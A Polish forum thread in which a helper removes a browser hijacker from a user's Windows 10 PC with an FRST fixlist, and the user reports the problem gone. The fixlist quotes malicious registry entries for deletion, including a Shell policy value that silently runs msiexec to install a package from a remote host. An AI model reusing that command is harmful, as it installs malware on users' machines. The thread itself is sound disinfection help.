Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Windows 10 - przekierowywanie przez luckystarting

Karnado 01 Maj 2017 18:15 489 4
  • Pomocny post
    #2 01 Maj 2017 18:26
    Kolobos
    Spec od komputerów

    Odinstaluj:
    YAC(Yet Another Cleaner!)
    AlphaGo

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {0550858A-48A7-48DE-A0D5-9BB75EB66F30} - \User_Feed_Synchronization-{C6561E84-BBD4-4E59-87C2-88A316C82987} -> Brak pliku <==== UWAGA
    Task: {05B1FF16-B339-4B89-88E4-1339085D5027} - \Windows-PG -> Brak pliku <==== UWAGA
    Task: {07F8D792-997D-484E-9C36-AC1D635C123C} - \T0528 -> Brak pliku <==== UWAGA
    Task: {165BD13B-3468-44DF-801D-DDB3327C9658} - \PCDEventLauncherTask -> Brak pliku <==== UWAGA
    Task: {21C3BFE0-48F4-438E-BA94-1BD99A0F6687} - \{B7461C0C-472E-4C8B-98A1-B66738525845} -> Brak pliku <==== UWAGA
    Task: {250AA2AC-EAE6-4D6B-B9CF-701FECFC517B} - \Dell SupportAssistAgent AutoUpdate -> Brak pliku <==== UWAGA
    Task: {26341F56-0924-4B25-B4E7-F3E4F75BC81F} - \CLVDLauncher -> Brak pliku <==== UWAGA
    Task: {4485F537-A4B5-41A1-A329-CC344431D6E3} - \Windows-WoShiBeiYongDe -> Brak pliku <==== UWAGA
    Task: {46709934-6B33-460A-88ED-BE0E474228BD} - \{931EFBC0-146E-485F-AAA7-792078CCB47C} -> Brak pliku <==== UWAGA
    Task: {55078EAE-708F-4C4F-AE83-84213329A103} - \CLMLSvc_P2G8 -> Brak pliku <==== UWAGA
    Task: {62D8C594-2FED-4A0C-AF9E-14C06229F02D} - \DropboxUpdateTaskMachineCore -> Brak pliku <==== UWAGA
    Task: {691EA1C9-20DD-46C0-BDC7-B69CC624EE86} - \RtHDVBg_PushButton -> Brak pliku <==== UWAGA
    Task: {932AF510-13F6-42F2-A578-B2B3D33F6999} - \HPCeeScheduleForWojtek -> Brak pliku <==== UWAGA
    Task: {98076C22-E319-4FD4-9399-0602FBDA07B8} - \BundleApplicationRepairToolLauncherTask -> Brak pliku <==== UWAGA
    Task: {986575EF-4A1A-444B-978A-8D595CABF6C9} - \OneDrive Standalone Update Task v2 -> Brak pliku <==== UWAGA
    Task: {9F945944-631E-4DA4-8301-9EF51834629A} - \PCDDataUploadTask -> Brak pliku <==== UWAGA
    Task: {B9EDCC18-D8C3-4500-BE7E-C6711E6374FC} - \GoogleUpdateTaskMachineUA -> Brak pliku <==== UWAGA
    Task: {CB4562E8-3C8D-488A-99CB-9DEAE6F33D9D} - \{EE5FCAB3-6EE5-4539-BA44-A6413E340262} -> Brak pliku <==== UWAGA
    Task: {E43545F7-D361-494E-B8DE-8B828ED22811} - \Milimili -> Brak pliku <==== UWAGA
    Task: {E7BDF459-74AB-466F-A984-1C137E61EA5B} - \{A7FE2579-D247-4BE6-8C66-E8BA29E9A6D9} -> Brak pliku <==== UWAGA
    Task: {EF8BBBEE-3128-41AA-BCB7-D0B9BC70386A} - \PowerWord-SCT-JT -> Brak pliku <==== UWAGA
    Task: {F0307202-3500-4345-AA2B-96801826E956} - \SystemToolsDailyTest -> Brak pliku <==== UWAGA
    Task: {F359CA0A-3369-4317-80C0-A71CE8DA6DF7} - \GoogleUpdateTaskMachineCore -> Brak pliku <==== UWAGA
    Task: {F7E8E267-D8D7-4B94-B742-08831A8C126D} - \DropboxUpdateTaskMachineUA -> Brak pliku <==== UWAGA
    Task: {FE87B222-13DB-4211-B4F6-E82D8AC64E41} - \PCDoctorBackgroundMonitorTask -> Brak pliku <==== UWAGA




    Shortcut: C:\Users\Wojtek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Wojtek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    ShortcutWithArgument: C:\Users\Wojtek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    2017-04-21 23:19 - 2016-05-23 04:37 - 00065696 ____N () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
    (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
    (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QNdY4FThXNkRYMWZXFjH5RjzXRWRLN8NLFTIdRWEcRq== /q
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\...\MountPoints2: {514161e2-c3d8-11e6-bc4d-a0d37a8bf2b7} - "F:\noautorun.exe"
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    GroupPolicyScripts: Ograniczenia <======= UWAGA
    GroupPolicyScripts-x32: Ograniczenia <======= UWAGA
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-747925333-1029383313-1720164980-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-747925333-1029383313-1720164980-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    Edge HomeButtonPage: HKU\S-1-5-21-747925333-1029383313-1720164980-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492629423&z=a5bb36283e602cc04660f21g6zdt7obqcodt9z9oeo&from=che0812&uid=ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_WBY0XPKZXXXXWBY0XPKZ&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-747925333-1029383313-1720164980-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
    R2 Kitty; C:\Users\Wojtek\AppData\Local\Kitty\Kitty.dll [257024 2017-04-28] (kitty) [Brak podpisu cyfrowego] <==== UWAGA
    R2 SNARE; C:\Users\Wojtek\AppData\Local\SNARE\Snare.dll [802816 2017-04-24] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    S2 3DM; C:\Users\Wojtek\AppData\Local\3DM\Kitty.dll [X]
    S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] <==== UWAGA
    R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
    R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== UWAGA
    2017-05-01 16:37 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
    2017-04-27 12:37 - 2017-04-28 19:36 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-21 23:19 - 2017-04-21 23:19 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-21 23:19 - 2017-04-21 23:19 - 00000000 ____D C:\Users\Wojtek\AppData\Roaming\Elex-tech
    2017-04-21 23:19 - 2017-04-21 23:19 - 00000000 ____D C:\Program Files (x86)\Elex-tech
    2017-04-21 23:18 - 2017-04-28 19:34 - 00000000 ____D C:\Program Files (x86)\AlphaGo
    2017-04-20 11:20 - 2017-04-28 19:35 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-20 11:20 - 2017-04-28 19:35 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-19 21:16 - 2017-04-27 13:09 - 00000000 ____D C:\Users\Wojtek\AppData\Local\3DM
    2017-04-19 20:15 - 2017-04-19 20:15 - 00000000 ____D C:\Program Files (x86)\MK
    2017-04-18 14:17 - 2017-04-28 19:35 - 00000000 ____D C:\Users\Wojtek\AppData\LocalLow\Mozilla
    2017-04-18 14:17 - 2017-04-18 14:17 - 00000000 ____D C:\Users\Wojtek\AppData\Local\Eastness
    2017-04-18 14:16 - 2017-05-01 16:11 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-18 14:16 - 2017-05-01 13:49 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-18 14:16 - 2017-04-28 19:34 - 00000000 ____D C:\Users\Wojtek\AppData\Roaming\WinSAPSvc
    2017-04-18 14:16 - 2017-04-21 23:18 - 00000000 ____D C:\Users\Wojtek\AppData\Local\Kitty
    2017-04-18 14:16 - 2017-04-18 14:16 - 00000000 ____D C:\Users\Wojtek\AppData\Local\Firefox
    2017-04-18 14:16 - 2017-04-18 14:16 - 00000000 ____D C:\ProgramData\Software
    2017-04-18 14:16 - 2017-04-18 14:16 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-18 14:16 - 2017-04-18 14:16 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-18 14:15 - 2017-04-25 14:37 - 00000000 ____D C:\Users\Wojtek\AppData\Local\SNARE
    2017-04-18 14:11 - 2017-04-27 13:28 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-05-01 16:38 - 2016-07-16 16:11 - 00000000 ____D C:\ProgramData\McAfee
    2017-05-01 16:38 - 2016-07-16 16:11 - 00000000 ____D C:\Program Files (x86)\McAfee
    EmptyTemp:

    W FRST wybierz Napraw.

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0
  • #3 01 Maj 2017 19:29
    Karnado
    Poziom 2  

    Zrobiłem jak poleciłeś, poniżej załączniki. Z tym, że w międzyczasie antywir zrobił restart i jak próbowałem usunąć YAC przez dodaj lub usuń programy to była informacja, że już nie ma go w tej lokalizacji, więc to jego sprawka podejrzewam?

    0
  • Pomocny post
    #4 01 Maj 2017 19:34
    Kolobos
    Spec od komputerów

    Usun katalog C:\FRST i to wszystko.

    YAC zostal juz usuniety przez FRST.

    0
  • #5 01 Maj 2017 19:39
    Karnado
    Poziom 2  

    Póki co wszystko ok. Dzięki serdeczne za pomoc : )

    0